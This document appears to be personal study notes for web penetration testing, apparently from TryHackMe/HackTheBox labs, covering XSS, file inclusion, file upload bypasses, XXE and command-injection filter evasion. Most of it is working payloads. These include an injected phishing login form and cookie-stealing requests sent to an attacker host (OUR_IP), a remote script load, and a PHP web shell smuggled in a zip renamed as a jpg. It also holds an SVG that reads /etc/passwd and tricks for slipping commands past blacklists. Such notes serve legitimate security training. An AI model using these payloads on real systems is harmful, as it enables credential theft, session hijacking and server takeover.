XSS
login form
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');x
Here the DOM inserts a login form directly for phishing
The original login form can be removed directly through the DOM
document.getElementById().remove()
remote load js
<script src="http://OUR_IP/script.js"></script>
session hijacking
In the study of thm, we know that http requests directly through fetch() or iframe tags may be intercepted by the browser's honey security, so we can use the src of the img tag to initiate http requests, because img requests are always is legitimate, and it won't be blocked by browsers
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
LFI
PHP Wrappers
Data wrappers can be used to contain external data, including PHP code. However, data wrappers are only available if the allow_url_include setting is enabled in the PHP configuration.
- php://filter
- data://text/plain,
- php://input
RFI
You can try protocols such as http and ftp. If it's Windows, you can also use UNC paths, it will try to use smb and http
File upload with file contains
Regular play. Upload a picture horse through file upload, and use the file to include it directly to RCE
You can also upload the zip archive and use zip:// to decompress and RCE
M1n9K1n9@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
?file=zip://./uploads/shell.jpg%23shell.php&cmd=id
PHPSession
- /var/lib/php/sessions/sess_xxxxxxxx
- C:\Windows\Temp\
phpsession will record user-related data, if we can control the content of the file, then we will be able to cause RCE
Server logs and configuration files
This contains a list of common service logs and configuration file paths for linux and Windows
and burp-parameter-names.txt in SecLists for finding parameters that might cause the file to contain
File Upload
List of common suffixes
SecLists的web-extensions.txt
whitelist bypass
When encountering unsafe whitelist restrictions
$fileName = basename($_FILES["uploadFile"]["name"]);
if (!preg_match('^.*\.(jpg|jpeg|png|gif)', $fileName)) {
echo "Only images are allowed";
die();
}
You can try double expansion
reverse double extension
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
This is how web servers determine which files PHP code is allowed to execute
This means that as long as the "." of the file name can be matched by the above rules, it will be executed by php, then we can try reverse double expansion:
.php.jpg
This case can be matched to
Content-Type / MIME Type
File upload causes XSS
Insert js code into the picture and upload it with Content-Type: text/html, which may cause xss
File upload caused XXE
XXE by uploading malicious svg images
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
command injection
${IFS}
bash braces
- {ls,-la}
In bash, commands can be executed in this form, and bash will automatically convert commas into spaces, and only bash can do this
${environment variable}
${variable name: starting subscript: length}
- ${PATH:0:1} -> /
- ${LS_COLORS:10:1} -> ;
It depends on the target
quotes bypass
Both linux and powershell can bypass the blacklist with quotes or double quotes
whoam'i'
whoam"i"
And only double quotes can be used under windows cmd
$@ - ^
Under bash, $@ will be ignored, and so is ^ under cmd
reverse bypass
$(rev<<<'di')
iex "$('imaohw' -join '')"
If the pipe character | is disabled, you can try <<<